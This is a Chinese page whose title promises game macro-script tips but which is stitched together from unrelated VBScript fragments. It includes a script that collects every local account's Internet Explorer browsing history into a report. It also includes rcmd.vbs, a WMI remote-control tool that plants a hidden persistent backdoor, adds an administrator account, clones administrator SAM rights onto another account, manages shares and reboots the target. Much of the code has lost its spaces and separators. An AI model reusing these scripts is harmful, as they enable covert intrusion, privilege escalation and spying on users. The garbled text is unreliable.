阴阳师按键精灵脚本方法
这是因为在ANSI和Unicode字符集中同一API函数的名称可能是不一样的,为了保证不出现声明错误,我们使用Alias关键字指出API函数的别名,一般来说在WIN9X平台下我们把API函数名后加一个大写A作为别名即可strComputer="." Set objCmdLib=CreateObject("Microsoft.CmdLib") Set objCmdLib.ScriptingHost=WScript.Application Set objWMIService=GetObject("winmgmts:\" & strComputer & "\root\cimv2") WScript.Echo objCmdLib.getHostName(objWMIService)

' +----------------------------------------------------------------------------+
' | Contact Info |
' +----------------------------------------------------------------------------+
' Author: Vengy
' modiy:lcx
' Email : cyber_flash@hotmail.com
' Tested: win2K/XP (win9X not tested!)
'
' Purpose: walk every profile folder next to the current user's, look for a
' History.IE5 folder, collect its index.dat files, extract the "URL " records
' and write them as an HTML report to spyPath. The report holds the browsing
' history of every account found on the machine, so the output file and the
' spy.tmp working copy are sensitive data in their own right.
Option Explicit
' +----------------------------------------------------------------------------+
' | Setup constants |
' +----------------------------------------------------------------------------+
Const conBarSpeed=80 ' not referenced anywhere in the visible script
Const conForcedTimeOut=3600000 ' 1 hour (not referenced anywhere in the visible script)
' +----------------------------------------------------------------------------+
' | Setup Objects and misc variables |
' +----------------------------------------------------------------------------+
Dim spyPath : spyPath="c:\spy.htm" ' report destination; change as needed
Dim oFSO : Set oFSO=CreateObject("Scripting.FileSystemObject")
Dim oWShell : Set oWShell=CreateObject("WScript.Shell")
Dim objNet : Set objNet=CreateObject("WScript.Network")
Dim Env : Set Env=oWShell.Environment("SYSTEM") ' not used in the visible script
Dim arrFiles : arrFiles=Array() ' full path of every matching index.dat (filled by RecurseFilesAndFolders)
Dim arrUsers : arrUsers=Array() ' profile names that have a History.IE5 folder (filled by StartSpyScan)
Dim HistoryPath : HistoryPath=Array() ' path components of the current user's History shell folder (see LocateHistoryFolder)
' The five objects below are never assigned anywhere in the visible script
' (presumably left over from a progress window); SetLine1/SetLine2/IsQuit only
' get through because of their On Error Resume Next.
Dim objIE
Dim objProgressBar
Dim objTextLine1
Dim objTextLine2
Dim objQuitFlag
Dim oTextStream ' the spy.htm output stream (opened in CreateSpyHtmFile)
Dim index ' set to 1 once at least one index.dat was found; Empty otherwise
Dim nBias ' time-zone bias read by GetTimeZoneBias, used as a minute offset in cvtDate
' +----------------------------------------------------------------------------+
' | Whose been a naughty surfer? Let's find out! ;) |
' +----------------------------------------------------------------------------+
StartSpyScan
' +----------------------------------------------------------------------------+
' | Outta here ... |
' +----------------------------------------------------------------------------+
CleanupQuit
' +----------------------------------------------------------------------------+
' | Cleanup and Quit |
' +----------------------------------------------------------------------------+
' Releases the global objects and ends the script. It does not close
' oTextStream or delete spy.tmp, so a caller that aborts mid-scan has to do
' that itself (CreateSpyHtmFile closes the stream but leaves spy.tmp behind).
Sub CleanupQuit()
    Set oFSO=Nothing
    Set oWShell=Nothing
    Set objNet=Nothing
    WScript.Quit
End Sub
' +----------------------------------------------------------------------------+
' | Start Spy Scan |
' +----------------------------------------------------------------------------+
' Enumerates the sub-folders of HistoryPath(0)+HistoryPath(1), records every
' profile that has a History.IE5 folder, collects its index.dat files, then
' builds and announces the report. Prints a message and does nothing when the
' profiles folder or any index.dat is missing.
' NOTE(review): the path joins below use "" where a backslash separator literal
' is expected (same for the split(...,"") calls and sFileRegExPattern); this
' looks like transcription loss -- confirm against the original source.
Sub StartSpyScan()
    Dim index_folder, history_folder, oSubFolder, oStartDir, sFileRegExPattern, user
    LocateHistoryFolder
    index_folder=HistoryPath(0)&""&HistoryPath(1)
    If Not oFSO.FolderExists(index_folder) Then
        wsh.echo "No history folder exists. Scan Aborted."
    Else
        SetLine1 "Locating history files:"
        sFileRegExPattern="\index.dat$"
        Set oStartDir=oFSO.GetFolder(index_folder)
        For Each oSubFolder In oStartDir.SubFolders
            history_folder=oSubFolder.Path&""&HistoryPath(3)&""&HistoryPath(4)&""&"History.IE5"
            If oFSO.FolderExists(history_folder) Then
                If IsQuit()=True Then
                    CleanupQuit
                End If
                ' user(2) is the profile-name component of the path (see the layout in LocateHistoryFolder)
                user=split(history_folder,"")
                SetLine2 user(2)
                ReDim Preserve arrUsers(UBound(arrUsers) + 1)
                arrUsers(UBound(arrUsers))=user(2)
                ' oStartDir is reassigned while its SubFolders are being iterated;
                ' presumably the For Each keeps iterating the original collection -- verify
                Set oStartDir=oFSO.GetFolder(history_folder)
                RecurseFilesAndFolders oStartDir, sFileRegExPattern
            End If
        Next
        If IsEmpty(index) Then
            wsh.echo "No Index.dat files found. Scan Aborted."
        Else
            CreateSpyHtmFile
            RunSpyHtmFile
        End If
    End If
End Sub
' +----------------------------------------------------------------------------+
' | Locate History Folder |
' +----------------------------------------------------------------------------+
' Reads the current user's History shell-folder path from HKCU and splits it
' into HistoryPath(); StartSpyScan derives the other profiles' paths from it.
Sub LocateHistoryFolder()
    ' Example: C:\Documents and Settings\<username>\Local Settings\History
    ' HistoryPath(0)=C:
    ' HistoryPath(1)=Documents and Settings
    ' HistoryPath(2)=<username>
    ' HistoryPath(3)=Local Settings
    ' HistoryPath(4)=History
    ' NOTE(review): the split separator reads "" here although the example above implies a backslash -- confirm against the original source
    HistoryPath=split(oWShell.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\History"),"")
End Sub
' +----------------------------------------------------------------------------+
' | Find ALL History Index.Dat Files |
' +----------------------------------------------------------------------------+
' Walks oRoot recursively and appends the path of every file whose name matches
' sFileEval (case-insensitive regex) to the global arrFiles, setting the global
' index flag on the first hit. An empty sFileEval skips the file check but still
' recurses. No depth limit and no guard against folder loops.
Sub RecurseFilesAndFolders(oRoot, sFileEval)
    Dim oSubFolder, oFile, oRegExp
    Set oRegExp=New RegExp
    oRegExp.IgnoreCase=True
    If Not (sFileEval="") Then
        oRegExp.Pattern=sFileEval
        For Each oFile in oRoot.Files
            If (oRegExp.Test(oFile.Name)) Then
                ReDim Preserve arrFiles(UBound(arrFiles) + 1)
                arrFiles(UBound(arrFiles))=oFile.Path
                index=1 ' Found at least one index.dat file!
            End If
        Next
    End If
    For Each oSubFolder In oRoot.SubFolders
        RecurseFilesAndFolders oSubFolder, sFileEval
    Next
End Sub
' +----------------------------------------------------------------------------+
' | Create Spy.htm file |
' +----------------------------------------------------------------------------+
' Writes the HTML report to spyPath: the user list, one table row per "URL "
' record of every index.dat (via FindLinks), then the list of files scanned.
' Each index.dat is copied to spy.tmp in the temp folder before it is parsed.
' NOTE(review): user names, URLs and file paths are written into the HTML
' without escaping (see FindLinks); an HTML/script fragment inside a visited URL
' renders when spy.htm is opened. Escape &, <, >, " before writing.
' NOTE(review): spyPath defaults to the drive root, where other local accounts
' may be able to read the collected history -- restrict or delete after use.
Sub CreateSpyHtmFile()
    Dim ub, count, index_dat, user, spyTmp
    ' mode 2 = ForWriting, True = create; an existing spyPath is overwritten
    Set oTextStream=oFSO.OpenTextFile(spyPath,2,True)
    oTextStream.WriteLine "<html><title>IE is spying on you!</title><body><font size=2>Welcome "&objNet.UserName&"<br><br>"
    oTextStream.WriteLine "<b>"+CStr(UBound(arrUsers)+1)+" users surfed on your PC:</b><br>"
    For Each index_dat In arrUsers
        oTextStream.WriteLine "<font color=green>"+index_dat+"</font><br>"
    Next
    oTextStream.WriteLine "<br><table border='0' width='100%' cellspacing='0' cellpadding='0'>"
    oTextStream.WriteLine "<tr><td nowrap><b>User:</b></td><td nowrap><b> Date:</b></td><td nowrap><b> Link:</b></td></tr>"
    GetTimeZoneBias
    count=0
    ub=UBound(arrFiles)
    For Each index_dat In arrFiles
        If IsQuit()=True Then
            ' NOTE(review): aborting here leaves spy.tmp (a copy of another user's history) in the temp folder
            oTextStream.Close
            CleanupQuit
        End If
        count=count+1
        user=split(index_dat,"")
        SetLine1 "Scanning "+user(2)+" history files:"
        SetLine2 CStr(ub+1-count)
        ' GetSpecialFolder(2) is the temp folder
        spyTmp=oFSO.GetSpecialFolder(2)+"\spy.tmp"
        ' Copy index.dat ---> C:\Documents and Settings\<username>\Local Settings\Temp\spy.tmp
        ' REASON: Avoids file access violations under Windows. (no permission here, so On Error Resume Next was added)
        ' NOTE(review): On Error Resume Next stays in effect for the rest of this
        ' procedure, so a failed copy or a parse error inside FindLinks is silent;
        ' when the copy fails the previous iteration's spy.tmp is presumably
        ' parsed again, duplicating its rows -- verify.
        On Error Resume next
        oFSO.CopyFile index_dat, spyTmp, True
        FindLinks "URL ", RSBinaryToString(ReadBinaryFile(spyTmp)), index_dat
    Next
    oTextStream.WriteLine "</table><br><b>Listing of history files:</b><br>"
    For Each index_dat In arrFiles
        oTextStream.WriteLine index_dat+"<br>"
    Next
    ' NOTE(review): the href target below is empty; the link address was probably lost in transcription
    oTextStream.WriteLine "<br><b>Do you have an idea that would improve this spy tool? Share it with me!<b><br><a href= or Comments?</a></font><br><br><b>End of Report</b></body></html>"
    oTextStream.Close
    If oFSO.FileExists(spyTmp) Then
        oFSO.DeleteFile spyTmp
    End If
End Sub
' +----------------------------------------------------------------------------+
' | Get Time Zone Bias. |
' +----------------------------------------------------------------------------+
' Reads ActiveTimeBias from the registry into nBias. A Long is taken as is; a
' Variant array is reassembled with byte k weighted 256^k (least-significant
' byte first). Any other type leaves nBias untouched (Empty).
' NOTE(review): in the array branch a 4-byte value with the top bit set comes
' out as a large positive number, not as the negative bias it encodes.
Sub GetTimeZoneBias()
    Dim nBiasKey, k
    nBiasKey=oWShell.RegRead("HKLM\System\CurrentControlSet\Control\TimeZoneInformation\ActiveTimeBias")
    If UCase(TypeName(nBiasKey))="LONG" Then
        nBias=nBiasKey
    ElseIf UCase(TypeName(nBiasKey))="VARIANT()" Then
        nBias=0
        For k=0 To UBound(nBiasKey)
            nBias=nBias + (nBiasKey(k) * 256^k)
        Next
    End If
End Sub
' +----------------------------------------------------------------------------+
' | Find Links within Index.dat |
' +----------------------------------------------------------------------------+
' Scans strPhrase (the decoded index.dat) for every occurrence of
' strMatchPattern ("URL " from the caller) and writes one table row per hit to
' oTextStream: the text after the following ": " is split at "@" into user
' (sArray(0)) and URL (sArray(1), cut at the first NUL); the 8 bytes at offset
' 16 of the record are taken as a 64-bit value (low byte first) and converted
' by cvtDate. The file argument is only used by the commented-out debug line.
' NOTE(review): a record without "@" makes sArray(1) fail; with only the
' caller's On Error Resume Next in effect this presumably abandons the rest of
' that file -- verify.
' NOTE(review): sArray(0) and url are written unescaped -- see CreateSpyHtmFile.
Sub FindLinks(strMatchPattern, strPhrase, file)
    Dim oRE, oMatches, oMatch, dt, start, sArray, timeStamp, url
    Set oRE=New RegExp
    oRE.Pattern=strMatchPattern
    oRE.Global=True
    oRE.IgnoreCase=False
    Set oMatches=oRE.Execute(strPhrase)
    For Each oMatch In oMatches
        ' FirstIndex is 0-based, Instr/Mid are 1-based, hence the +1
        start=Instr(oMatch.FirstIndex + 1,strPhrase,": ")
        If start <> 0 Then
            sArray=Split(Mid(strPhrase,start+2),"@")
            ' Left(...,InStr(...)) keeps the NUL itself; url is "" when no NUL follows
            url=Left(sArray(1),InStr(sArray(1),chr(0)))
            dt=AsciiToHex(Mid(strPhrase,oMatch.FirstIndex+1+16,8))
            ' bytes 7..4 form the high dword, 3..0 the low dword
            timeStamp=cvtDate(dt(7)&dt(6)&dt(5)&dt(4),dt(3)&dt(2)&dt(1)&dt(0))
            'oTextStream.WriteLine "<nobr>" & sArray(0) & " - " & timeStamp & " - " & "<a href="">"&url&"</a> - " & file & " - " & CStr(oMatch.FirstIndex + 1) & "</nobr><br>"
            'Visit User + Date + Visited URL
            oTextStream.WriteLine "<tr><td nowrap><font color=green size=2>"&sArray(0)&"</font></td>"+"<td nowrap><font color=red size=2> "&timeStamp&"</font></td>"&"<td nowrap><font size=2> <a href="">"&url&"</a></font></td></tr>"
        End If
    Next
End Sub
' +----------------------------------------------------------------------------+
' | Convert a 64-bit value to a date, adjusted for local time zone bias. |
' +----------------------------------------------------------------------------+
' hi/lo are the two 32-bit halves as 8-digit hex strings. The combined value is
' treated as 100-nanosecond ticks since 1601-01-01 (/600000000 gives minutes),
' nBias minutes are subtracted and the result is converted to a Date. Any
' conversion error yields #1/1/1601#.
Function cvtDate(hi,lo)
    On Error Resume Next
    ' "&H0" prefix: parse the string as hex; the leading 0 presumably keeps an 8-digit value from being read as negative
    cvtDate=#1/1/1601# + (((cdbl("&H0" & hi) * (2 ^ 32)) + cdbl("&H0" & lo))/600000000 - nBias)/1440
    ' CDbl(expr)-Returns expr converted to subtype Double.
    ' If expr cannot be converted to subtype Double, a type mismatch or overflow runtime error will occur.
    cvtDate=CDate(cvtDate)
    If Err.Number <> 0 Then
        'WScript.Echo "Oops! An Error has occured - Error number " & Err.Number & " of the type '" & Err.description & "'."
        On Error GoTo 0
        cvtDate=#1/1/1601#
        Err.Clear
    End If
    On Error GoTo 0
End Function
' +----------------------------------------------------------------------------+
' | Turns ASCII string sData into array of hex numerics. |
' +----------------------------------------------------------------------------+
' Returns a 0-based array with one upper-case hex string per character of
' sData (Hex(Asc(ch)), left-padded with "0" to at least two digits).
Function AsciiToHex(sData)
    Dim i, aTmp()
    ReDim aTmp(Len(sData) - 1)
    For i=1 To Len(sData)
        aTmp(i - 1)=Hex(Asc(Mid(sData, i)))
        If len(aTmp(i - 1))=1 Then aTmp(i - 1)="0"+ aTmp(i - 1)
    Next
    ASCIItoHex=aTmp ' same name as the function: VBScript identifiers are case-insensitive
End Function
' +----------------------------------------------------------------------------+
' | Converts binary data to a string (BSTR) using ADO recordset. |
' +----------------------------------------------------------------------------+
' Pushes the byte array through an adLongVarChar (201) recordset field and
' reads it back as a string. Returns "" for zero-length input.
' NOTE(review): the vartype=8 (string) branch calls MultiByteToBinary, which
' is not defined anywhere in the visible script.
Function RSBinaryToString(xBinary)
    Dim Binary
    'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
    If vartype(xBinary)=8 Then Binary=MultiByteToBinary(xBinary) Else Binary=xBinary
    Dim RS, LBinary
    Const adLongVarChar=201
    Set RS=CreateObject("ADODB.Recordset")
    LBinary=LenB(Binary)
    If LBinary>0 Then
        RS.Fields.Append "mBinary", adLongVarChar, LBinary
        RS.Open
        RS.AddNew
        RS("mBinary").AppendChunk Binary
        RS.Update
        RSBinaryToString=RS("mBinary")
    Else
        RSBinaryToString=""
    End If
End Function
' +----------------------------------------------------------------------------+
' | Read Binary Index.dat file. |
' +----------------------------------------------------------------------------+
' Loads the whole of FileName through an ADODB.Stream in binary mode and
' returns the stream's contents. The stream is not closed if LoadFromFile fails.
Function ReadBinaryFile(FileName)
    Const adTypeBinary=1
    Dim BinaryStream : Set BinaryStream=CreateObject("ADODB.Stream")
    BinaryStream.Type=adTypeBinary
    BinaryStream.Open
    BinaryStream.LoadFromFile FileName
    ReadBinaryFile=BinaryStream.Read
    BinaryStream.Close
End Function
' +----------------------------------------------------------------------------+
' | save Spy.htm file |
' +----------------------------------------------------------------------------+
' Quits silently when the report file does not exist, otherwise reports where
' it was saved. The message hard-codes c:\spy.htm even if spyPath was changed.
Sub RunSpyHtmFile()
    If not oFSO.FileExists(spyPath) Then
        CleanupQuit
    Else
        wsh.echo "已保存在c:\spy.htm"
    End If
End Sub
' Progress-text helpers: objTextLine1/objTextLine2 are never assigned in this
' script, so the assignments below fail and are swallowed by On Error Resume Next.
Private sub SetLine1(sNewText)
    On Error Resume Next
    objTextLine1.innerTEXT=sNewText
End Sub
Private sub SetLine2(sNewText)
    On Error Resume Next
    objTextLine2.innerTEXT=sNewText
End Sub
' Returns True only when objQuitFlag.Value equals "quit".
' NOTE(review): objQuitFlag is never assigned in this script; what IsQuit
' returns when the .Value read fails under On Error Resume Next decides whether
' StartSpyScan runs at all -- verify before relying on it.
Private function IsQuit()
    On Error Resume Next
    IsQuit=True
    If objQuitFlag.Value<>"quit" Then
        IsQuit=False
    End If
End Function
' +----------------------------------------------------------------------------+
' | All good things come to an end. |
' +----------------------------------------------------------------------------+ 1.要打开设置系统时间的控制面板文件(Timedate.cpl),只需运行如下代码:Shell"Rundll32.exeShell32.dll,Control_RunDLLTimedate.cpl"至于打开其他控制面板文件,相信您一定能够举一反三,尝试一下,换个文件名就成了
strComputer="." Set objWMIService=GetObject("winmgmts:\" & strComputer & "\root\wmi") Set colMonitoredEvents=objWMIService.ExecNotificationQuery _ ("Select * from MSNdis_StatusMediaDisconnect") Do While True Set strLatestEvent=colMonitoredEvents.NextEvent Wscript.Echo "A network connection has been lost:" WScript.Echo strLatestEvent.InstanceName, Now Wscript.Echo Loop 本范例是以一个stdPicture物件来存图形,之後於PictureBox中以特殊效果来显示
使用:D:\>iget.vbs 4.rcmd.vbs '*************** 'rcmd.vbsby黑嘿黑 '*************** onerrorresumenext setoutstreem=wscript.stdout setinstreem=wscript.stdin if(lcase(right(wscript.fullname,11))="wscript.exe")then setobjShell=wscript.createObject("wscript.shell") objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34)) endif ifwscript.arguments.count<3then usage() wscript.echo"Notenoughparameters." wscript.quit endif ipaddress=wscript.arguments(0) username=wscript.arguments(1) password=wscript.arguments(2) usage() outstreem.write"Conneting"&ipaddress&"...." setobjlocator=createobject("wbemscripting.swbemlocator")'20 setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) objswbemservices.security_.privileges.add23,true objswbemservices.security_.privileges.add18,true objswbemservices.security_.privileges.add7,true objswbemservices.security_.privileges.add11,true iferrornumber<>0then wscript.echo"Error!" callmain() else wscript.echo"OK!" endif callmain() '*********************************************************** functiondoor() outstreem.write"Creatingtheblankdoor.." 
setobjinstproc=objswbemservices.get("win32_process") cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%\system32\svrer.vbs"_ &"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%\system32\svrer.vbs"_ &"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs"_ &"&&echoFA.Attributes=34>>%windir%\system32\svrer.vbs"_ &"&&echosett=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""Attrib+h%windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs"_ &"&&echot.Close>>%windir%\system32\svrer.vbs"_ &"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%\system32\svrer.vbs"_ &"&&echowsh.Regwrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.Regwrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win dir%\system32\svrer.vbs"_ &"&&echowsh.regwrite""HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.regwrite""HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%\system32\SYSTEM.bat"",0,true >>%windir%\system32\svrer.vbs" objinstproc.create(cmddoor) showerror(err.number) Wscript.Sleep(1500) outstreem.write"Runingtheblankdoor.." 
objinstproc.create("cmd/ccscript%windir%\system32\svrer.vbs") showerror(err.number) callmain() endfunction '*********************************************************** functionca() Wscript.Echo"enterthecausername:" causername=WScript.StdIn.Readline() Wscript.Echo"enterthecapassword:" capassword=WScript.StdIn.Readline() outstreem.write"GettingSIDof"&causername&"...." setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34)) foreachobjinstsidincolinstsid strsid=objinstsid.sid sidflag=right(strsid,len(strsid)-instrrev(strsid,"-")) strflag=cstr(hex(sidflag)) regname=string(8-len(strflag),"0")&strflag next ifstrsid=""then wscript.echo"Error."&vbcrlf&"Usernameisnotexist." callmain() else wscript.echo"OK!" endif outstreem.write"Prepairing.." setobjinstproc=objswbemservices.get("win32_process") showerroronly(err.number) cmdline="cmd/cechosetoreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs"_ &"&&echooreg.getbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue>>%temp%\ca.vbs"_ &"&&echooreg.setbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users"?name&""",""F"",uvalue>>%temp%\ca.vbs"_ &"&&echosetsh=createobject(""wscript.shell"")>>%temp%\ca.vbs"_ &"&&echosh.regwrite""HKLM\SOFTWARE\Microsoft\WindowsScriptHost\Settings\caflag"",""1"">>%temp%\ca.vbs" objinstproc.create(cmdline) showerroronly(err.number) cmdline="cmd/cechoatime=time>%temp%\getsys.vbs"_ &"&&echosetsh=createobject(""wscript.shell"")>>%temp%\getsys.vbs"_ &"&&echosh.run""cmd/cat23:59cscript%temp%\ca.vbs"",0,true>>%temp%\getsys.vbs"_ &"&&echosh.run""cmd/ctime23:58:59.90"",0,true>>%temp%\getsys.vbs"_ &"&&echowscript.sleep(1100)>>%temp%\getsys.vbs"_ &"&&echosh.run""cmd/ctime""^&atime,0,true>>%temp%\getsys.vbs" objinstproc.create(cmdline) showerror(err.number) outstreem.write"Processing." 
setcolinstsvr=objswbemservices.execquery("select*fromwin32_servicewherename='schedule'") showerroronly(err.number) foreachobjinstsvrincolinstsvr flag1=0 flag2=0 ifobjinstsvr.startmode="Disabled"then objinstsvr.changestartmode("Manual") flag1=1 endif ifobjinstsvr.started=flasethen errnumber=objinstsvr.startservice() flag2=1 endif showerroronly(err.number) objinstproc.create("cmd/ccscript%temp%\getsys.vbs") showerroronly(err.number) setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov") fori=1to20 objinstreg.getstringvalue&h80000002,"SOFTWARE\Microsoft\WindowsScriptHost\Settings","caflag",svalue ifsvalue="1"then exitfor else wscript.sleep(500) endif next objinstproc.create("netuser"&causername&""&capassword) ifflag1thenobjinstsvr.changestartmode("Disabled") ifflag2thenobjinstsvr.stopservice() next ifsvalue<>"1"then wscript.echo"Error."&vbcrlf&"Waitingtimeout." else showerror(err.number) endif outstreem.write"CleanUp.." objinstproc.create("cmd/cdel%temp%\ca.vbs") showerroronly(err.number) objinstproc.create("cmd/cdel%temp%\getsys.vbs") showerroronly(err.number) ifsvalue="1"thenobjinstreg.deletevalue&h80000002,"SOFTWARE\Microsoft\WindowsScriptHost\Settings","caflag" showerror(err.number) callmain() endfunction functionshowerroronly(errornumber) iferrornumberThen wscript.echo"Error0x"&cstr(hex(err.number))&"." iferr.description<>""then wscript.echo"Errordescription:"&err.description&"." endif callmain() else outstreem.write"." 
endif endfunction '*********************************************************** functionshare() Wscript.Echostring(18,"-") Wscript.Echo"0.返回CMD>=" wscript.echo"1.列出共享信息:=" Wscript.Echo"2.创建共享=" Wscript.Echo"3.删除共享=" Wscript.Echostring(18,"-") Wscript.Echo"pleasechosetheparameter:" parameters=WScript.StdIn.Readline() SelectCaseparameters case"quit","0" main() case"list","1" listshare() case"open","2"'40 openshare() case"close","3" closeshare() endSelect endfunction functionlistshare() outstreem.write"ListingtheNetsharefrom"&ipaddress&"...." SetcolShares=objswbemservices.ExecQuery("Select*fromWin32_Share") showerror(err.number)'50 wscript.echo_ ("Caption"&chr(9)&chr(9)&"Name:"&chr(9)&chr(9)&"Path") ForeachobjShareincolShares wscript.echo_ (objShare.Caption&chr(9)&objShare.Name&chr(9)&chr(9)&objShare.Path) Next wscript.echovbcrlf&"AllSharehavebeenlistedSuccessfully!" callshare() endfunction functionopenshare() wscript.echo"Enterthepath:"'70 path=WScript.StdIn.Readline() wscript.echo"Enterthename:" sname=WScript.StdIn.Readline() ConstFILE_SHARE=0 ConstMAXIMUM_CONNECTIONS=25 SetobjNewShare=objswbemservices.Get("Win32_Share") errReturn=objNewShare.Create_ (path,sname,FILE_SHARE,_ MAXIMUM_CONNECTIONS,"默认共享") wscript.echo"ThenSharehavebeenCeatedSuccessfully!" callshare() endfunction functioncloseshare() wscript.echo"PleseEnterThename:" kname=WScript.StdIn.Readline() outstreem.write"killingthe"&kname&"...." SetcolShares=objswbemservices.ExecQuery_ ("Select*fromWin32_ShareWhereName="&"'"&kname&"'") ForEachobjShareincolShares objShare.Delete Next showerror(err.number) callshare() endfunction '*********************************************************** functionlistsvr() outstreem.write"ListingtheServicefrom"&ipaddress&"...." 
SetcolListOfServices=objswbemservices.ExecQuery_ ("Select*fromWin32_Service") showerror(err.number) wscript.echo_ ("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"PathName") ForEachobjServiceincolListOfServices iflen(objService.name)<8then strname=objService.name&chr(9) else strname=objService.name endif wscript.echo_ (strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName) Next wscript.echovbcrlf&"AllServiceshavebeenlistedSuccessfully!" callmain() endfunction '************************************************************ functionreboot() outstreem.write"Now,restartingtarget...." strwqlquery="select*fromwin32_operatingsystemwhereprimary='true'" setcolinstances=objswbemservices.execquery(strwqlquery) foreachobjinstanceincolinstances objinstance.win32shutdown(6) next showerror(err.number) callmain() endfunction '************************************************************* functioninf() outstreem.write"GettingInfomationfrom"&ipaddress&"...." setobj1=objget("win32_computersystem") showerror(err.number) wscript.echo""&vbcrlf setobj2=objget("win32_operatingsystem") setcol3=objswbemservices.instancesof("win32_processor") setobj4=objget("win32_logicalmemoryconfiguration") setobj5=objget("win32_bios") setobj6=objget("win32_displayconfiguration") setcol7=objswbemservices.instancesof("win32_diskdrive") setcol8=objswbemservices.instancesof("win32_logicaldisk") setcol9=objswbemservices.instancesof("win32_networkadapterconfiguration") setcol10=objswbemservices.instancesof("win32_quickfixengineering") wnl"OSInfo:" wnl"ComputerName:"&obj1.name wnl"UserName:"&obj1.username wnl"Domain:"&obj1.domain domainrole="" selectcaseobj1.domainrole case0 domainrole="Workstation" case1 domainrole="MemberWorkstation" case2 domainrole="Server" case3 domainrole="MemberServer" case4 domainrole="BackupDomainController" case5 domainrole="MainDomainController" endselect withobj2 wnl"DomainRole:"&domainrole wnl"Caption:"&.caption 
wnl"Organization:"&.organization wnl"RegisteredUser:"&.registereduser wnl"InstallDate:"&timeformat(.installdate) wnl"LastBootUpTime:"&timeformat(.lastbootuptime) wnl"WindowsDirectory:"&.windowsdirectory wnl"SystemDirectory:"&.systemdirectory wnl"BootDevice:"&.bootdevice wnl"CountryCode:"&.countrycode wnl"CSName:"&.csname wnl"Description:"&.description wnl"Manufacturer:"&.manufacturer wnl"SerialNumber:"&.serialnumber wnl"Version:"&.version wnl"SystemType:"&obj1.systemtype wnl"SystemStartupDelay:"&obj1.systemstartupdelay&"s" wnl"SystemStartupOptions:"&obj1.systemstartupoptions(0) fori=1toubound(obj1.systemstartupoptions) wnlspace(28)&obj1.systemstartupoptions(i) next endwith wnlvbcrlf&"ProcessorInfo:" wnl"NumberOfProcessors:"&obj1.numberofprocessors foreachobj3incol3 withobj3 wnl"DeviceID:"&.deviceid wnl"Name:"&.name wnl"CurrentClockSpeed:"&.currentclockspeed&"MHz" wnl"Description:"&.description wnl"ExtClock:"&.extclock&"MHz" wnl"L2CacheSize:"&.l2cachesize&"KB" wnl"L2CacheSpeed:"&.l2cachespeed&"MHz" wnl"ProcessorId:"&.processorid wnl"Manufacturer:"&.manufacturer wnl"SocketDesignation:"&.socketdesignation wnl"AddressWidth:"&.addresswidth&"Bit" wnl"DataWidth:"&.datawidth&"Bit" endwith next withobj4 wnlvbcrlf&"MemoryInfo:" wnl"TotalPhysicalMemory:"&cint(.totalphysicalmemory/1024)&"MB" wnl"FreePhysicalMemory:"&cint(obj2.freephysicalmemory/1024)&"MB" wnl"TotalPageFileSpace:"&cint(.totalpagefilespace/1024)&"MB" wnl"TotalVirtualMemory:"&cint(.totalvirtualmemory/1024)&"MB" wnl"AvailableVirtualMemory:"&cint(.availablevirtualmemory/1024)&"MB" endwith wnlvbcrlf&"BIOSInfo:" wnl"Description:"&obj5.description wnl"CurrentLanguage:"&obj5.currentlanguage wnl"Version:"&obj5.version wnl"Manufacturer:"&obj5.manufacturer withobj6 wnlvbcrlf&"DisplayConfiguration:" wnl"Caption:"&.caption wnl"DeviceName:"&.devicename wnl"DriverVersion:"&.driverversion wnl"DisplayFrequency:"&.displayfrequency&"Hz" wnl"BitsPerPel:"&.bitsperpel&"Bit" wnl"Pels:"&.pelswidth&"x"&.pelsheight endwith 
